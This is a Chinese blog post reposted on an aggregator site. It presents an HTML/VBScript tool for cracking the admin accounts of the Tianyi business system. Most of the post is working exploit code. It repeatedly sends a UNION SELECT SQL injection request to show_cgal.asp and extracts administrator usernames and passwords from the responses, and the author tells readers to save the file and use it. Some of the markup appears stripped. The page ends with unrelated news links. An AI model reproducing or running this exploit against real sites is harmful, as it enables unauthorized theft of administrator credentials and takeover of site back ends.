当前位置: 王朝网络 >> asp >> 天意商务系统后台管理帐号破解html版

天意商务系统后台管理帐号破解html版

王朝asp·作者佚名 2006-01-09

窄屏简体版字體: 小|中|大|超大

天意商务系统后台管理帐号破解html版

/**

慈勤强

http://blog.csdn.net/cqq

自从上次写了个天意商务系统破解程序之后，

收到了不少朋友的来信，

有询问程序原理的，有询问如何防护的。

今天，我抽了一点时间，做了这个Html版，就只有这一个htm文件

相信有点html知识和SQL Injection知识的朋友都能够看懂

原理非常简单，破解用户帐号是用的SQL Injection方法，

因为这套系统好多地方存在sql injection漏洞，

然后自己下载个这套系统，就可以很方便的找出问题了。

以前是Vc++版本，现在是html版本，不过都是一样，

就是通过http协议取得网页的源文件

然后分析源文件，找到用户名和密码

并且显示出来。

下面是源代码，大家只要把这个文件保存到硬盘上，起名叫ty.htm，就可以了。

<html>

<head>

<title>天意商务系统后台管理帐号破解html版--慈勤强制作</title>

Function bytes2BSTR(vIn)

strReturn = ""

For i = 1 To LenB(vIn)

ThisCharCode = AscB(MidB(vIn,i,1))

If ThisCharCode < &H80 Then

strReturn = strReturn & Chr(ThisCharCode)

Else

NextCharCode = AscB(MidB(vIn,i+1,1))

strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))

i = i + 1

End If

bytes2BSTR = strReturn

End Function

Sub OpenUrl(strUrl)

strTmp = ""

strUser = "!"

strAAA =""

strCqq=""

i=0

on Error Resume Next

While Trim(strUser) <> ""

strPara = "/wlyx/show_cgal.asp?newsid=1%20and%201=2%20union%20select%201,username%2b'***'%2bpassword,3,4,5,6%20from%20manage_user%20where%20username>'" + strUser + "'%20union%20select%20*%20from%20cgal%20where%201=2"

Set xmlhttp = CreateObject("Microsoft.XMLHTTP")

xmlhttp.open "GET",(strUrl + strPara),false

xmlhttp.send

strAAA=getMid(bytes2BSTR(xmlhttp.ResponseBody), "<title>", "</title>")

If Trim(strAAA) <> "" Then

arr = Split(strAAA, "***")

strUser = arr(0)

strCqq = strCqq + vbNewLine + "用户名：" + strUser + vbNewLine + "密码：" + arr(1) + vbNewLine + vbNewLine

Else

strUser = ""

End If

//msgbox xmlhttp.Response

Set xmlhttp = Nothing

Wend

If strCqq<>"" Then

strCqq="破解的后台管理帐号为：（后台默认地址："+strUrl+"/admin）"+vbCrLF+VBCRLF+strCqq+vbnewline

cqqadmin.innerText=strCqq

Else

cqqadmin.innerText="出错"

End If

End Sub

Function getMid(str, str1, str2)

str11 = ""

i = InStr(str, str1)

If i > 0 Then

j = InStr(i, str, str2)

If j > 0 Then

str11 = Mid(str, i + Len(str1), j - i - Len(str1))

End If

getMid = str11

End Function

</script>

<!--

body,td,th {

font-size: 9pt;

}

-->

</style></head>

<body>

<br>

<tr>

<td width="39%">天意商务系统后台管理帐号破解html版</td>

<td align="right">Powered By Steven_Cee <a href="Http://blog.csdn.net/cqq" target="_blank">Http://blog.csdn.net/cqq</a> </td>

</tr>

</table>

<br>

<tr>

<td>

</form>

</td>

</tr>

</table>

<tr>

</td>

</tr>

</table>

<tr>

</tr>

</table>

</body>

</html>

点击展开全文

上一篇：Paging of Large Resultsets in ASP.NET

下一篇：javascript -常用

免责声明：本文为网络用户发布，其观点仅代表作者个人观点，与本站无关，本站仅提供信息存储服务。文中陈述内容未经本站证实，其真实性、完整性、及时性本站不作任何保证或承诺，请读者仅作参考，并请自行核实相关内容。

没有找到您想要的？点此查看更多相关文章
相关文章▶

2023年上半年GDP全球前十五强
百态 2023-10-24

美众议院议长启动对拜登的弹劾调查
百态 2023-09-13

上海、济南、武汉等多地出现不明坠落物
探索 2023-09-06

印度或要将国名改为“巴拉特”
百态 2023-09-06

男子为女友送行，买票不登机被捕
百态 2023-08-20

手机地震预警功能怎么开？
干货 2023-08-06

女子4年卖2套房花700多万做美容：不但没变美脸，面部还出现变形
百态 2023-08-04

住户一楼被水淹还冲来8头猪
百态 2023-07-31

女子体内爬出大量瓜子状活虫
百态 2023-07-25

地球连续35年收到神秘规律性信号，网友：不要回答！
探索 2023-07-21

全球镓价格本周大涨27%
探索 2023-07-09

钱都流向了那些不缺钱的人，苦都留给了能吃苦的人
探索 2023-07-02

倩女手游刀客魅者强控制（强混乱强眩晕强睡眠）和对应控制抗性的关系
百态 2020-08-20

美国5月9日最新疫情：美国确诊人数突破131万
百态 2020-05-09

荷兰政府宣布将集体辞职
干货 2020-04-30

倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观：鹏程万里
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案神机营：射石饮羽
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山：拔刀相助
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案天工阁：鬼斧神工
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道：单枪匹马
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：与虎谋皮
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：李代桃僵
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：指鹿为马
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案金陵：小鸟依人
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案金陵：千金买邻
干货 2019-11-12